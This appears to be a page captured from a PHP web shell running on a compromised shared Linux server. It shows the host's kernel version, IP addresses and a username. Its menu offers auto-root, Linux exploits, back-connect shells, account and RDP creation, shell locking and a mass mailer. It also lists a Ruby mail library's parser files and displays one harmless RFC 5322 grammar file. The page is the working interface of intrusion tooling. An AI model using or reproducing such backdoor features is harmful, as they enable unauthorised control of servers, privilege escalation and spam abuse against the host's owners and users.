Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
mail /
parsers /
[ HOME SHELL ]
Name
Size
Permission
Action
address_lists_parser.rb
1.39
MB
-rw-r--r--
address_lists_parser.rl
4.54
KB
-rw-r--r--
content_disposition_parser.rb
27.77
KB
-rw-r--r--
content_disposition_parser.rl
2.14
KB
-rw-r--r--
content_location_parser.rb
24.37
KB
-rw-r--r--
content_location_parser.rl
1.78
KB
-rw-r--r--
content_transfer_encoding_pars...
14.67
KB
-rw-r--r--
content_transfer_encoding_pars...
1.56
KB
-rw-r--r--
content_type_parser.rb
32.39
KB
-rw-r--r--
content_type_parser.rl
2.13
KB
-rw-r--r--
date_time_parser.rb
26.95
KB
-rw-r--r--
date_time_parser.rl
1.32
KB
-rw-r--r--
envelope_from_parser.rb
127.9
KB
-rw-r--r--
envelope_from_parser.rl
1.91
KB
-rw-r--r--
message_ids_parser.rb
103.07
KB
-rw-r--r--
message_ids_parser.rl
1.92
KB
-rw-r--r--
mime_version_parser.rb
14.15
KB
-rw-r--r--
mime_version_parser.rl
1.4
KB
-rw-r--r--
phrase_lists_parser.rb
26.94
KB
-rw-r--r--
phrase_lists_parser.rl
1.83
KB
-rw-r--r--
received_parser.rb
331.92
KB
-rw-r--r--
received_parser.rl
1.96
KB
-rw-r--r--
rfc2045_content_transfer_encod...
486
B
-rw-r--r--
rfc2045_content_type.rl
1.06
KB
-rw-r--r--
rfc2045_mime.rl
435
B
-rw-r--r--
rfc2183_content_disposition.rl
483
B
-rw-r--r--
rfc3629_utf8.rl
647
B
-rw-r--r--
rfc5234_abnf_core_rules.rl
440
B
-rw-r--r--
rfc5322.rl
2.11
KB
-rw-r--r--
rfc5322_address.rl
2.92
KB
-rw-r--r--
rfc5322_date_time.rl
1.35
KB
-rw-r--r--
rfc5322_lexical_tokens.rl
2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rfc5322_lexical_tokens.rl
%%{ # RFC 5322 Internet Message Format # Section 3.2. Lexical Tokens # https://tools.ietf.org/html/rfc5322#section-3.2 machine rfc5322_lexical_tokens; alphtype int; include rfc5234_abnf_core_rules "rfc5234_abnf_core_rules.rl"; # 3.2.1. Quoted characters obs_NO_WS_CTL = 0x01..0x08 | "\v" | "\f" | 0x0e..0x1f | 0x7f; obs_qp = "\\" (0x00 | obs_NO_WS_CTL | LF | CR); quoted_pair = ("\\" (VCHAR | WSP)) | obs_qp; # 3.2.2. Folding White Space and Comments obs_FWS = (CRLF? WSP)+; FWS = (WSP* CRLF WSP+) | (CRLF WSP+) | obs_FWS; obs_ctext = obs_NO_WS_CTL; rfc5322_ctext = 0x21..0x27 | 0x2a..0x5b | 0x5d..0x7e | obs_ctext; ctext = rfc5322_ctext | utf8_non_ascii; # RFC6532 for UTF-8 # Recursive comments action comment_begin { fcall comment_tail; } action comment_exit { fret; } ccontent = ctext | quoted_pair | "(" @comment_begin; comment_tail := ((FWS? ccontent)* >comment_s) FWS? ")" @comment_exit; comment = "(" @comment_begin %comment_e; CFWS = ((FWS? comment)+ FWS?) | FWS; # 3.2.3. Atom rfc5322_atext = ALPHA | DIGIT | "!" | "#" | "$" | "%" | "&" | "'" | "*" | "+" | "-" | "/" | "=" | "?" | "^" | "_" | "`" | "{" | "|" | "}" | "~"; atext = rfc5322_atext | utf8_non_ascii; # RFC6532 for UTF-8 atom = CFWS? atext+ CFWS?; dot_atom_text = atext ("." atext)*; dot_atom = CFWS? dot_atom_text CFWS?; # 3.2.4. Quoted Strings obs_qtext = obs_NO_WS_CTL; rfc5322_qtext = 0x21 | 0x23..0x5b | 0x5d..0x7e | obs_qtext; qtext = rfc5322_qtext | utf8_non_ascii; # RFC6532 for UTF-8 qcontent = qtext | quoted_pair; quoted_string = CFWS? (DQUOTE (((FWS? qcontent)* FWS?) >qstr_s %qstr_e) DQUOTE) CFWS?; # 3.2.5. Miscellaneous Tokens word = atom | quoted_string; obs_phrase = (word | "." | "@")+; phrase = (obs_phrase | word+) >phrase_s %phrase_e; # Not part of RFC, used for keywords per 3.6.5 Information Fields phrase_lists = phrase ("," FWS* phrase)*; }%%
Close